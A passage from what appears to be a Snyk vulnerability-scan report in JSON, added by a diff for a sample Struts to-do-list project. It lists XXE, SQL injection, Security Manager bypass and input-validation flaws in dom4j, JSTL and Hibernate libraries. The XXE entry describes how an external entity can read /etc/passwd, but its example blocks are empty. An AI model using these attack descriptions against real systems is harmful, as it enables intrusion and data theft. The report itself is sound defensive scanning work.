"severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.985080Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "dom4j:dom4j", + "version": "1.6.1", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-JAVAXSERVLET-30449", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "credit": [ + "David Jorm" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "javax.servlet:jstl", + "references": [ + { + "url": "http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E", + "title": "Apache Mail Archive" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254", + "title": "NVD" + }, + { + "url": "https://access.redhat.com/security/cve/CVE-2015-0254", + "title": "RedHat CVE Database" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "cvssV3BaseScore": 7.6, + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:43.270072Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:45:52.623697Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.6, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:48.017447Z" + } + ], + "description": "## Overview\n[javax.servlet:jstl](https://mvnrepository.com/artifact/javax.servlet/jstl) is a collection of useful JSP tags which encapsulates the core functionality common to many JSP applications.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a `` or `` JSTL XML tag.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. 
When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `javax.servlet:jstl`.\n\n## References\n- [Apache Mail Archive](http://mail-archives.us.apache.org/mod_mbox/www-announce/201502.mbox/%3C82207A16-6348-4DEE-877E-F7B87292576A@apache.org%3E)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0254)\n- [RedHat CVE Database](https://access.redhat.com/security/cve/CVE-2015-0254)\n", + "epssDetails": { + "percentile": "0.94002", + "probability": "0.07046", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2015-0254" + ], + "CWE": [ + "CWE-94" + ], + "GHSA": [ + "GHSA-6x4w-8w53-xrvv" + ] + }, + "packageName": "javax.servlet:jstl", + "proprietary": false, + "creationTime": "2017-02-22T07:28:19.341000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2015-02-27T16:13:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } 
+ ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "javax.servlet", + "artifactId": "jstl" + }, + "publicationTime": "2015-02-27T16:51:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:48.017447Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "javax.servlet:jstl@1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "javax.servlet:jstl", + "version": "1.2", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.4.24.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "5.4.24.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", + "className": "SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Delete.java", + "className": "Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Insert.java", + "className": "Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/InsertSelect.java", + "className": "InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + 
"[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/QuerySelect.java", + "className": "QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Select.java", + "className": "Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/SimpleSelect.java", + "className": "SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Update.java", + "className": "Update", + "functionName": "toStatementString" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", + "title": "GitHub Commit" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2020-25638", + "title": "Redhat CVE Details" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:14.190706Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, 
+ { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", + "epssDetails": { + "percentile": "0.72103", + "probability": "0.00352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25638" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-11-19T16:51:52.251545Z", + "functions_new": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Insert", + "functionName": "toStatementString" + } + 
}, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Update", + "functionName": "toStatementString" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-11-19T16:51:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-11-19T16:57:14.572204Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.086548Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + 
"Gail Badner" + ], + "semver": { + "vulnerable": [ + "[,5.3.18.Final)", + "[5.4.0.Final, 5.4.18.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.18.Final", + "5.4.18.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", + "className": "LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/pull/3438", + "title": "GitHub Pull Request" + }, + { + "url": "https://hibernate.atlassian.net/browse/HHH-14077", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:47.723462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + 
"severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", + "epssDetails": { + "percentile": "0.42797", + "probability": "0.00104", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14900" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-07-15T13:53:15.331818Z", + "functions_new": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-18T13:46:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-07-15T16:40:12Z", + "severityBasedOn": "CVSS", + 
"modificationTime": "2024-03-11T09:53:49.262550Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-30098", + "title": "JSM bypass via ReflectionHelper", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[4.1.0.Beta1, 4.3.2.Final)", + "[5.0.0.Final,5.1.2.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "4.3.2.Final", + "5.1.2.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e", + "title": "GitHub Commit" + }, + { + "url": 
"https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e", + "title": "GitHub Commit" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-912", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/CVE-2014-3558", + "title": "Redhat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:48.734535Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:46:09.119807Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:45.778673Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable 
to JSM bypass via ReflectionHelper. ReflectionHelper (`org.hibernate.validator.util.ReflectionHelper`) in Hibernate Validator 4.1.0 before 4.2.1, 4.3.x before 4.3.2, and 5.x before 5.1.2 allows attackers to bypass Java Security Manager (JSM) restrictions and execute restricted reflection calls via a crafted application.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 4.3.2.Final, 5.1.2.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/2c95d4ea0ef20977be249e31a4a4f4f4f71c945d)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/67fdff14831c035c25e098fe14bd86523d17f726)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/7e7131939a4361a7cad3e77ab89a8462132c561c)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c489416f699a46859c134796b3ccfea41ef3ce52)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/c9525ca544b1281e2b7c7347e86e87c86dc1dc6e)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/e8c42b689df8c6752d635d02c6518da3fece3870)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/f97c2021a03c825abdeca1692f5be51e77e76a8f)\n- [GitHub Commit](https://github.com/hibernate/hibernate-validator/commit/fd4eaed7fb930db6a5e4c03742b4b3adcfecc90e)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-912)\n- [Redhat Bugzilla](https://bugzilla.redhat.com/CVE-2014-3558)\n", + "epssDetails": { + "percentile": "0.70800", + "probability": "0.00319", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2014-3558" + ], + "CWE": [ + "CWE-592" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2016-12-25T16:51:53Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2014-07-17T16:51:53Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": 
"secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2014-07-17T16:51:53Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:45.778673Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-validator", + "version": "4.3.1.Final", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-568162", + "title": "Improper Input Validation", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "credit": [ + "Alvaro Muñoz" + ], + "semver": { + "vulnerable": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "6.0.19.Final", + "6.1.3.Final" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "filePath": "org/hibernate/validator/internal/engine/ValidatorImpl.java", + "className": "ValidatorImpl", + "functionName": "validate" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-validator", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-validator/pull/1071", + "title": "GitHub PR" + }, + { + "url": "https://hibernate.atlassian.net/browse/HV-1758", + "title": "Jira Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1805501", + "title": "RedHat 
Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:37.379564Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.797394Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:54:00.490090Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-validator](https://mvnrepository.com/artifact/org.hibernate/hibernate-validator) is a Hibernate Validator Engine Relocation Artifact.\n\nAffected versions of this package are vulnerable to Improper Input Validation. A bug in the message interpolation processor enables invalid EL expressions to be evaluated as if they were valid. 
This flaw allows attackers to bypass input sanitation (escaping, stripping) controls that developers may have put in place when handling user-controlled data in error messages.\n## Remediation\nUpgrade `org.hibernate:hibernate-validator` to version 6.0.19.Final, 6.1.3.Final or higher.\n## References\n- [GitHub PR](https://github.com/hibernate/hibernate-validator/pull/1071)\n- [Jira Issue](https://hibernate.atlassian.net/browse/HV-1758)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1805501)\n", + "epssDetails": { + "percentile": "0.49937", + "probability": "0.00139", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10693" + ], + "CWE": [ + "CWE-20" + ], + "GHSA": [ + "GHSA-rmrm-75hp-phr2" + ] + }, + "packageName": "org.hibernate:hibernate-validator", + "proprietary": false, + "creationTime": "2020-05-05T12:05:58.541980Z", + "functions_new": [ + { + "version": [ + "[,6.0.19.Final)", + "[6.1.0,6.1.3.Final)" + ], + "functionId": { + "className": "org.hibernate.validator.internal.engine.ValidatorImpl", + "functionName": "validate" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-05-05T00:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-validator" + }, + "publicationTime": "2020-05-05T16:32:46Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:54:00.490090Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": 
